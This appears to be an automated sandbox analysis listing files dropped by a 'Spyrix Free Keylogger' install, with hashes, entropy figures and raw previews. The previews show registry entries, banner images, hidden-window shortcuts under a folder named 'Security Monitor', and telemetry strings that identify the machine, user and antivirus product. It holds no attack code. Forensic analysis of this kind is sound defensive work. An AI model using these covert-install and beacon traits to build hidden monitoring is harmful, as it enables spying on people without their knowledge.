                                                                                                                                                                                                                                                          Preview:..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r._.i.s.1.].....".I.n.n.o. .S.e.t.u.p.:. .S.e.t.u.p. .V.e.r.s.i.o.n.".=.".5...5...9. .(.u.).".....".I.n.n.o. .S.e.t.u.p.:. .A.p.p. .P.a.t.h.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.".....".I.n.s.t.a.l.l.L.o.c.a.t.i.o.n.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.\.".....".I.n.n.o. .S.e.t.u.p.:. .I.c.o.n. .G.r.o.u.p.".=.".S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r.".....".I.n.n.o. .S.e.t.u.p.:. .U.s.e.r.".=.".f.r.o.n.t.d.e.s.k.".....".I.n.n.o. .S.e.t.u.p.:. .L.a.n.g.u.a.g.e.".=.".e.n.g.l.i.s.h.".....".D.i.s.p.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7609
                                                                                                                                                                                                                                                          Entropy (8bit):7.838852889190603
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CRjl+OutIyaaHKip9QY5Lg6pWlicYMG5/b:OshLaIFUug6pGzo
                                                                                                                                                                                                                                                          MD5:359D85C48DCA7C9C529A7EC0F4D30DC4
                                                                                                                                                                                                                                                          SHA1:749EE1A5C90299C9360DD3131222CE92584FFCC2
                                                                                                                                                                                                                                                          SHA-256:03BBB9C7C115C8FD5E2FB573B86687AE27672C7F8B970FB9661E5007FC6E42BE
                                                                                                                                                                                                                                                          SHA-512:9494049C968B6BEE93090630086EB4D8129B48E5E6CBA3CF2E7EEF2114948316D0068F859594EA3A464AB2FE99510C1C94EEF786A933114C0CFC630C13435B1D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9....Gq.....$...Z...ud.........|.........,&..........M5.................g.........................yv.....6.............v.72......g.L........C.................T.......m...kg.......eX...X}.k..{................s.......{..........................................n...................C......ZU..................................................`......D@.M........z........F..........|..a....................i........................s.......UQ...............................4c...................?%....w.#Y.BBB.........000.........fff.....888TTTxxx.ZD..........................d.........................................................................r..*]....Q.....U..~............OM.......................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90361
                                                                                                                                                                                                                                                          Entropy (8bit):7.9769989580983625
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:Zy6BW/LDE6LyfJVEr+jMi2hm9YFrRUv9Ie2eIDtTER:M6eL46LCJVpCsy6IAIRe
                                                                                                                                                                                                                                                          MD5:3475836FCF6BBE603D1E83DD8A3C4765
                                                                                                                                                                                                                                                          SHA1:DD92253B2600C1612FDC657FFB41E4FD66352C6B
                                                                                                                                                                                                                                                          SHA-256:F8E582779693B4DAB740E13721093D9B8EB69DC0FF5CFACB5208C04321BA37F8
                                                                                                                                                                                                                                                          SHA-512:8AE5E48692962A7F8049521F3B3510F1F1B9EF7CAF4A40526D7D6286BBEB647CFA54D88AF9A8E03AD884A42AECBA677E0A229577A394CD228CDF98E0F99506E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at..........u.J................i]OOH..........mQ...K2..C$..............B*.p..X...dH....V<........M........%#"...........z.....[&....x8#.........`..............,$.....}}}.._...d0......Hw.hih...L..............xK..q..v.............e(......~......`.z`..........g.;".......t..........Y....r+.....q....xd...........R...........ad\.......WA......a...Y).R......3... .....]CHA6.......n............z ....a<..2.*b...................L0....%+...nst]cc......lnk..M..x....QD.....&........Y..;........syu^^X......~..........fnr..e..xL..................U.hV....`..j................D....g..R....^.....<5.vqCCC..84/..2..5../..;.....&....L%.r+...........).....................................................W..V.......v............R......WYW....?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90699
                                                                                                                                                                                                                                                          Entropy (8bit):7.976611505014986
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:TO6fc7nz/3pXEtubO/n9l7STXTQXsxalgH8UsX4UzAY3p18N14e86zebLqDf:BEzzRXEtubO/yTXTlxbrUDcu/8v4e8AH
                                                                                                                                                                                                                                                          MD5:EF79CF8AABBC41E42025D3ACF51B36C9
                                                                                                                                                                                                                                                          SHA1:71940D0E9D230D295D8A89397DF4ED0BA5BD72DA
                                                                                                                                                                                                                                                          SHA-256:24D4AC7D4101A76F35F636660A92AD95E1C068065D17BB4F8CC27CD3C91402F8
                                                                                                                                                                                                                                                          SHA-512:E579BEED091D3A4068AE664640BA0EDCFB309F0C7142CD452B45F79A69B6423A8237D9256C9A0E3FFE4F22EBC1C01D26B2BE79FD7B3E3E9643A1142A997E5902
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at.......s...............f[.......u..mQ...ONH.L1..C;................C+.qX....X.dH......W>...........M..........'&#.z....[&..x7".......................Y........+#{}}.......^...a.......hih...X..............zL....n..v..........e(........`.za..........j.7 .......m..........y.......u,......q....we.........T.............dd[.......WCi......e..Y*.R...4...!.....\BEC?..........n...............a>..b.Cy.............=CH.}.....M0....%+nst]dc......mpl.O...N..x....E?.....).....[..;.......sxq[^X......}.........c...fmr..~M..................L.k_...._..j.{.................D....f....a.....?(..{.|{974..5...../..;.....&....L%.r+...........).......................................................................W....v...............R...YYW.......?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7829
                                                                                                                                                                                                                                                          Entropy (8bit):7.826687568770807
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZwZ+70N539DtmJu0clifT2eTb6uRM3Q6q:Z0+QNftOcloTBTtRMHq
                                                                                                                                                                                                                                                          MD5:241545A94AF6185978CFD96B32101E95
                                                                                                                                                                                                                                                          SHA1:75FC98239798D933FD87978D7545964CE0E611D8
                                                                                                                                                                                                                                                          SHA-256:01FD9E13EEF1D14C6C2B4E5EA16E40789FE5423715500C29A7DC58FDF2C1364F
                                                                                                                                                                                                                                                          SHA-512:1A127A5EB9573418B3301A0E498B5335AEE0E99F87C8B4C12B6907476D49D1781264700A692FBE24971D405695AAE9BD5C4F40E95D10A1F26CBB0818A32899E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9...............g.............r...w................m.............$.....Z...ud.........|..............-(.......M5o...................h.............6{...........yu6.............w.83.........L.....>..d.........U....m...mj.......eYY~.k..{.............................w........c....................!r............p........W.........E.....ZU.......j.................................b.....Qw..D@.N......L.z......F.A...........|..N......f.............x.........].......UQ.........................................`.....?%.w.#Y....BBB...fff............000...TTT888.....xxx.ZD.....................b.....>j....Iq...................................................@l.......~........Q..U..............4c.........._......OM.................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 327 x 57
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):7829
                                                                                                                                                                                                                                                          Entropy (8bit):7.826687568770807
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:ZwZ+70N539DtmJu0clifT2eTb6uRM3Q6q:Z0+QNftOcloTBTtRMHq
                                                                                                                                                                                                                                                          MD5:241545A94AF6185978CFD96B32101E95
                                                                                                                                                                                                                                                          SHA1:75FC98239798D933FD87978D7545964CE0E611D8
                                                                                                                                                                                                                                                          SHA-256:01FD9E13EEF1D14C6C2B4E5EA16E40789FE5423715500C29A7DC58FDF2C1364F
                                                                                                                                                                                                                                                          SHA-512:1A127A5EB9573418B3301A0E498B5335AEE0E99F87C8B4C12B6907476D49D1781264700A692FBE24971D405695AAE9BD5C4F40E95D10A1F26CBB0818A32899E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89aG.9...............g.............r...w................m.............$.....Z...ud.........|..............-(.......M5o...................h.............6{...........yu6.............w.83.........L.....>..d.........U....m...mj.......eYY~.k..{.............................w........c....................!r............p........W.........E.....ZU.......j.................................b.....Qw..D@.N......L.z......F.A...........|..N......f.............x.........].......UQ.........................................`.....?%.w.#Y....BBB...fff............000...TTT888.....xxx.ZD.....................b.....>j....Iq...................................................@l.......~........Q..U..............4c.........._......OM.................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                          Entropy (8bit):4.248529327128576
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:N1KJS40dyTKVQXGNErnVernn:Cc40dyTK6XaErVer
                                                                                                                                                                                                                                                          MD5:8F1A40DDD71F7EA45DF0E2FE0BACA597
                                                                                                                                                                                                                                                          SHA1:E64C2983DE93F6566752E01BC0A2A5F3983759F6
                                                                                                                                                                                                                                                          SHA-256:2360EAEBD32653D08F75DB2F1C2AE67F4AE3906D09F94AD4C532BA35951553D1
                                                                                                                                                                                                                                                          SHA-512:C73BE7BE0C52CDAB4BA1E3022D9D1E1E2DBC897E34A4F243A7D8936BB7B4A2F46DF2BD1F6E7CA63F6A80C799E4EAD1EAEE38550683473EBF53FC8E2569112BBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:http://www.spyrix.com/purchase.php?prg=sfk
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 884 x 198
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):90699
                                                                                                                                                                                                                                                          Entropy (8bit):7.976611505014986
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:TO6fc7nz/3pXEtubO/n9l7STXTQXsxalgH8UsX4UzAY3p18N14e86zebLqDf:BEzzRXEtubO/yTXTlxbrUDcu/8v4e8AH
                                                                                                                                                                                                                                                          MD5:EF79CF8AABBC41E42025D3ACF51B36C9
                                                                                                                                                                                                                                                          SHA1:71940D0E9D230D295D8A89397DF4ED0BA5BD72DA
                                                                                                                                                                                                                                                          SHA-256:24D4AC7D4101A76F35F636660A92AD95E1C068065D17BB4F8CC27CD3C91402F8
                                                                                                                                                                                                                                                          SHA-512:E579BEED091D3A4068AE664640BA0EDCFB309F0C7142CD452B45F79A69B6423A8237D9256C9A0E3FFE4F22EBC1C01D26B2BE79FD7B3E3E9643A1142A997E5902
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:GIF89at.......s...............f[.......u..mQ...ONH.L1..C;................C+.qX....X.dH......W>...........M..........'&#.z....[&..x7".......................Y........+#{}}.......^...a.......hih...X..............zL....n..v..........e(........`.za..........j.7 .......m..........y.......u,......q....we.........T.............dd[.......WCi......e..Y*.R...4...!.....\BEC?..........n...............a>..b.Cy.............=CH.}.....M0....%+nst]dc......mpl.O...N..x....E?.....).....[..;.......sxq[^X......}.........c...fmr..~M..................L.k_...._..j.{.................D....f....a.....?(..{.|{974..5...../..;.....&....L%.r+...........).......................................................................W....v...............R...YYW.......?%.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):716
                                                                                                                                                                                                                                                          Entropy (8bit):5.443947945910689
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:32KM9PyjM1usvOq/bubJncTJK/WtyC3kuUMnMNW69tZJ2jEqRkHZgZJ2W8XU:37jMpOSubOTk/CUuUGM9OEqRkHZAak
                                                                                                                                                                                                                                                          MD5:1B1EB5DF7EB065533A6D81103A377353
                                                                                                                                                                                                                                                          SHA1:6CEA72FDF02AB9EB52820368714A2A378DAE61DC
                                                                                                                                                                                                                                                          SHA-256:0C6AEAEFAB5B44B44F2E2786F1695E08F6C42A5194789D62263E36CDE57A3035
                                                                                                                                                                                                                                                          SHA-512:2EFB19D6117CE77001175F8C5BC8FBC0F5D8C281F3112D45666F2797969CA0A2C816E0B6768917A4DF6024ACB0F1F4A5A23D9D81352FA6424C6A24C2CC5D1458
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[explorer.exe]..Description=Windows Explorer..Path=C:\Windows\Explorer.EXE..[ApplicationFrameHost.exe]..Description=Application Frame Host..Path=C:\Windows\system32\ApplicationFrameHost.exe..[WinStore.App.exe]..Description=Store..Path=C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe..[TextInputHost.exe]..Description=..Path=C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe..[QxLdykJKCWWKpklQOBHWL.exe]..Description=..Path=C:\Program Files (x86)\RjYTcMidoJjeOdgHaFqOXKqLFQeuLyBWRaUrluRJSimiVXODOGPLRf\QxLdykJKCWWKpklQOBHWL.exe..[chrome.exe]..Description=Google Chrome..Path=C:\Program Files\Google\Chrome\Application\chrome.exe..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Wed Oct 2 04:58:16 2024, mtime=Wed Oct 2 04:58:16 2024, atime=Mon Sep 23 18:21:00 2024, length=5346216, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2100
                                                                                                                                                                                                                                                          Entropy (8bit):3.6717318849627136
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8VAmtl37DQj+mj9k+mE9k+m9kWNH+m98pJpt:8Ftuj+wk+Hk+yt+n/
                                                                                                                                                                                                                                                          MD5:1722C2144536880FCE8D53313C0E6566
                                                                                                                                                                                                                                                          SHA1:845DE6633A1C3BC6FA3D7EF0C1F604CA371078F1
                                                                                                                                                                                                                                                          SHA-256:690AD3E2ECC9031937E135B2C3A8EA7CF934C5E1BABFA7A8C5DAA42E842D4615
                                                                                                                                                                                                                                                          SHA-512:92504ABD95D04631D2401F41A0F86F977DE678FB2CE1C0A282FC589AE80980CE10DD944C478C0757ADACC7977C6F320CE0324A2EAF8BF17E32F0B25DD70C013E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ..Z.......V.................Q..........................P.O. .:i.....+00.../C:\...................`.1.....BYH/. PROGRA~3..H......O.IBYH/....g.......................:.P.r.o.g.r.a.m.D.a.t.a.....j.1.....BYH/. SECURI~1..R......BYH/BYH/....,.......................:.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.......1.....BYM/. {827D2~1..~......BYH/BYM/....;.....................u.q.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.....Z.2...Q.7Y.. spkl.exe..B......BYI/BYI/..............................s.p.k.l...e.x.e.......~...............-.......}....................C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe..I.....\.....\.....\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.s.p.k.l...e.x.e.F.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.O.C.:.\.P.r.o.g.r
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Oct 2 04:58:15 2024, mtime=Wed Oct 2 04:58:15 2024, atime=Wed Oct 2 04:56:22 2024, length=1308909, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1176
                                                                                                                                                                                                                                                          Entropy (8bit):4.640636930220267
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:8mABWDQbmKM5i8QEqyA10Y3Sk+18k79k+18OJplptm:8mABLmtlgRX3R+mk79k+muplpt
                                                                                                                                                                                                                                                          MD5:ECB9D391BD7E15EE73BE8B3901B914E2
                                                                                                                                                                                                                                                          SHA1:F437B08D6FA58147071D8BA939ED0DB21433F402
                                                                                                                                                                                                                                                          SHA-256:23BB0D9204E4C45BA2DCA68405CE1AB1CAC008FE44BD544A105B97A7DAA1DA53
                                                                                                                                                                                                                                                          SHA-512:2645015586DF401841D17EB2C41EB0C38D118E1869AE5E64BD631C16F22A0E62DDB8D487B33D62B8E214DB95C7628F13A8C1511F668C0D2C3DAACBE96BDED2C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:L..................F.... ...E.............T...................................P.O. .:i.....+00.../C:\...................`.1.....BYH/. PROGRA~3..H......O.IBYH/....g.......................:.P.r.o.g.r.a.m.D.a.t.a.....j.1.....BYH/. SECURI~1..R......BYH/BYH/....,.......................:.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.......1.....BYM/. {827D2~1..~......BYH/BYM/....;.....................u.q.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.....f.2.....BY./ unins000.exe..J......BYH/BYH/...........................q$.u.n.i.n.s.0.0.0...e.x.e.......................-............................C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe..M.....\.....\.....\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.u.n.i.n.s.0.0.0...e.x.e.F.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                          Entropy (8bit):5.1401597574002045
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:FB92iY7hCkrMdBRzDCEzUwXVXLbsKXj/bdYgfiE3T+tD0UDiA7TGCGJJpUNfGX2x:LK7EkrMdBpFXVXLbTz/bdAEkZXujvw
                                                                                                                                                                                                                                                          MD5:C74A0AE687A5A113F3E1DEB8F4C03830
                                                                                                                                                                                                                                                          SHA1:53F0E21453012889EF41F0FCD938EE806177A94F
                                                                                                                                                                                                                                                          SHA-256:794112733367AE9B1D7523C663B9AFD66BD5BEB9A91627477BB02833DCF395A5
                                                                                                                                                                                                                                                          SHA-512:1CA4828950C0393BB287B66E0BA39421AA675CB2A1392875AE6E56615BA5A821448C5769A5FE0037812C2900217308D26F1943976D3A90835533B9F041D605EA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:&action=app:Monitoring:StartButton&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:37.800&prg_lng=english&os_caption= ()&os_type=windows&os_country_code=&time_shift=-5&os_install_date=-- ::&av=Windows Defender&dnet=4.8.04084&trial_id=-1&license=&prg_seconds=2&token=e8ba7f4df0c2ecc85f73f117f522ce09
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (423), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):423
                                                                                                                                                                                                                                                          Entropy (8bit):5.134727884549545
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:FB92iNECkrMdBRzDCEzUwXVXLbsKAMbdYgfiE3T+tD0UDiA7TGCGJJpLyTyXWdH2:LbHkrMdBpFXVXLbTdbdAEkZmyR+T
                                                                                                                                                                                                                                                          MD5:AFF92B473E136E0933CA361806D28BDE
                                                                                                                                                                                                                                                          SHA1:3D12802DA77DBAE811BD52E0919E6FA26818A60B
                                                                                                                                                                                                                                                          SHA-256:22C97B3869D70B3C12B9F7D5FC414274501E1EF77B6C62992F1F966E037A0442
                                                                                                                                                                                                                                                          SHA-512:21604E0F77C998D600B07BC20DCD236D1B2943095ECB053D253381007EC4FD82CEA1E3C0D65944D88B3DD6800887B4DCA8A235A82D4B16C655624D6F2549C240
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:&action=app:Monitoring:Start&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:41.881&prg_lng=english&os_caption= ()&os_type=windows&os_country_code=&time_shift=-5&os_install_date=-- ::&av=Windows Defender&dnet=4.8.04084&trial_id=-1&license=&prg_seconds=6&token=2917861fce135311cbef238b89eefda7
                                                                                                                                                                                                                                                          Process:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (416), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):416
                                                                                                                                                                                                                                                          Entropy (8bit):5.146874889253628
                                                                                                                                                                                                                                                          Encrypted:false
